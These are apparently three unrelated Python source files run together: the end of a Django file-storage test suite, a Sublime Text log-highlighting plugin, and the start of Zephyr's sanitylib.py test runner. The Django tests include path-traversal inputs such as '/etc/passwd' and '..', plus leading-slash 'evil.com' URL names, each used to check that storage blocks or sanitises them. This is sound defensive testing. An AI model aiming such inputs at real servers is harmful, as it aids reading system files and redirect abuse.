File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url('test.file')
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
self.assertEqual(
storage.url('test.file'),
'%s%s' % (storage.base_url, 'test.file')
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), {'storage_dir_1'})
self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousOperation):
self.storage.exists('..')
with self.assertRaises(SuspiciousOperation):
self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error'):
raise FileExistsError()
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file', ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file', ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Exceptions aside from FileNotFoundError are raised.
with self.assertRaises(FileExistsError):
self.storage.save('error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, 'error.file'):
raise PermissionError()
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save('error.file', ContentFile('delete with error'))
with self.assertRaises(PermissionError):
self.storage.delete('error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT='media_root',
MEDIA_URL='media_url/',
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated on
referenced settings change while specified values should be unchanged.
"""
storage = self.storage_class(
location='explicit_location',
base_url='explicit_base_url/',
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
'MEDIA_ROOT': 'overriden_media_root',
'MEDIA_URL': 'overriden_media_url/',
'FILE_UPLOAD_PERMISSIONS': 0o333,
'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, 'explicit_location')
self.assertIn('explicit_location', storage.location)
self.assertEqual(storage.base_url, 'explicit_base_url/')
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
logviewplus.py | import sublime, sublime_plugin
import threading
import unicodedata
class StatusAnimation:
animation = [ "... ", " ... ", " ...", " ... "]
animationPos = 0
stopFlag = False
view = None
key = None
updateLock = threading.RLock()
def updateAnimation(self):
if (self.stopFlag):
self.view = None
self.key = None
else:
with self.updateLock:
if (self.stopFlag == False):
self.view.set_status(self.key, self.prefix + self.animation[self.animationPos])
self.animationPos += 1
if (self.animationPos >= len(self.animation)): self.animationPos = 0
sublime.set_timeout(self.updateAnimation, 500)
def start(self, view, prefix, delay, key):
# Show the first animation step and wait for the given time before starting the animation
view.set_status(key, prefix + self.animation[0])
self.animationPos = 1
self.stopFlag = False
self.view = view
self.key = key
self.prefix = prefix
sublime.set_timeout(self.updateAnimation, delay)
def stop(self):
with self.updateLock:
self.stopFlag = True
self.view.erase_status(self.key)
class LogViewPlus:
regionStyles = {
"fill": 0,
"outline": sublime.DRAW_NO_FILL,
"underline": sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_SOLID_UNDERLINE,
"none": sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE
}
regexPrefix = "(?<![\\w])("
regexSuffix = ")(?![\\w])"
def highlight(self, view, regex, regionName, scope, icon, regionFlags):
if (regex == "") or (regex == None):
return []
foundRegions = view.find_all(regex, sublime.IGNORECASE, None, None)
numFoundRegions = len(foundRegions)
if (numFoundRegions > 0):
# Expand all regions to match the whole line and mark the line with the given scpe
for i in range(0, numFoundRegions):
foundRegions[i] = view.line(foundRegions[i])
view.add_regions(regionName, foundRegions, scope, "Packages/LogViewPlus/" + icon + ".png", regionFlags);
return foundRegions
def markupView(self, view, statusAnimation):
settings = sublime.load_settings("logviewplus.sublime-settings")
errorRegex = settings.get("error_filter", "error|fail|exception")
errorScope = settings.get("error_scope", "markup.deleted")
errorStatusCaption = settings.get("error_status_caption", "Errors")
warningRegex = settings.get("warning_filter", "warning|not found|defer(ed)?")
warningScope = settings.get("warning_scope", "markup.changed")
warningStatusCaption = settings.get("warning_status_caption", "Warnings")
markRegex = settings.get("mark_filter", "start(ing|ed)?|quit|end|shut(ing)? down")
markScope = settings.get("mark_scope", "markup.inserted")
markStatusCaption = settings.get("mark_status_caption", "Marks")
highlighStyle = settings.get("highlight_style", "underline")
autoMatchWords = settings.get("auto_match_words", True)
# If auto_match_words is set to true, extend the regular expressions with lookarounds to only match words.
if (autoMatchWords):
errorRegex = self.regexPrefix + errorRegex + self.regexSuffix
warningRegex = self.regexPrefix + warningRegex + self.regexSuffix
markRegex = self.regexPrefix + markRegex + self.regexSuffix
# Determin the falgs to set on the region for correct highlighting
if (highlighStyle in self.regionStyles):
regionFlags = self.regionStyles[highlighStyle]
else:
regionFlags = self.regionStyles["outline"]
foundRegions = self.highlight(view, markRegex, "logfile.marks", markScope, "mark", regionFlags)
view.set_status("logviewplus.2", markStatusCaption + " " + str(len(foundRegions)))
bookmarks = foundRegions
foundRegions = self.highlight(view, warningRegex, "logfile.warnings", warningScope, "warning", regionFlags)
view.set_status("logviewplus.1", warningStatusCaption + " " + str(len(foundRegions)))
bookmarks += foundRegions
foundRegions = self.highlight(view, errorRegex, "logfile.errors", errorScope, "error", regionFlags)
view.set_status("logviewplus.0", errorStatusCaption + " " + str(len(foundRegions)))
bookmarks += foundRegions
del foundRegions
# Set a bookmark for each region
view.add_regions("bookmarks", bookmarks, "bookmarks", "", sublime.HIDDEN);
del bookmarks
# Stop the animation
statusAnimation.stop()
statusAnimation = None
# Set the final message
sublime.status_message("")
# Called to prepare the view:
# Makes it read only and applies the highlighting
def prepareView(self, view):
# view.set_read_only(True)
# view.set_status("logviewplus", "read-only")
# Set a temporary message
statusAnimation = StatusAnimation()
statusAnimation.start(view, "Parsing", 2000, "0")
#sublime.status_message("Processing log...")
# Do the markup processing in its own thread.
threading.Thread(target = self.markupView, daemon = True, args=[view, statusAnimation], kwargs={}).start()
# Called to remove the preparations from the log file and turn it into a normal view.
def unprepareView(self, view):
# view.set_read_only(False)
# view.erase_status("logviewplus")
view.erase_status("logviewplus.0")
view.erase_status("logviewplus.1")
view.erase_status("logviewplus.2")
view.erase_regions("logfile.errors")
view.erase_regions("logfile.warnings")
view.erase_regions("logfile.marks")
view.erase_regions("bookmarks")
class EventListener(LogViewPlus, sublime_plugin.EventListener):
# Called when a file is finished loading.
def on_load(self, view):
if (view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage"):
self.prepareView(view)
# Called if a new view is created from an existing one. We've to check again if this view contains a logfile.
def on_clone(self, view):
if (view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage"):
self.prepareView(view)
# Called if a text command is executed on the buffer
def on_text_command(self, view, command_name, args):
if (command_name == "set_file_type"):
currentSyntax = view.settings().get('syntax')
newSyntax = args["syntax"]
if (newSyntax != currentSyntax):
if (newSyntax == "Packages/LogViewPlus/logviewplus.tmLanguage"):
# If the new syntax is logviewplus then prepare the view.
self.prepareView(view)
else:
# If the old syntax was logviewplus then remove our preparations
if (view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage"):
self.unprepareView(view)
# Always run the command as is
return None
class LogViewPlusRescan(LogViewPlus, sublime_plugin.TextCommand):
def run(self, edit):
if (self.view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage"):
self.unprepareView(self.view)
self.prepareView(self.view)
def is_enabled(self):
return self.view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage" |
sanitylib.py | #!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
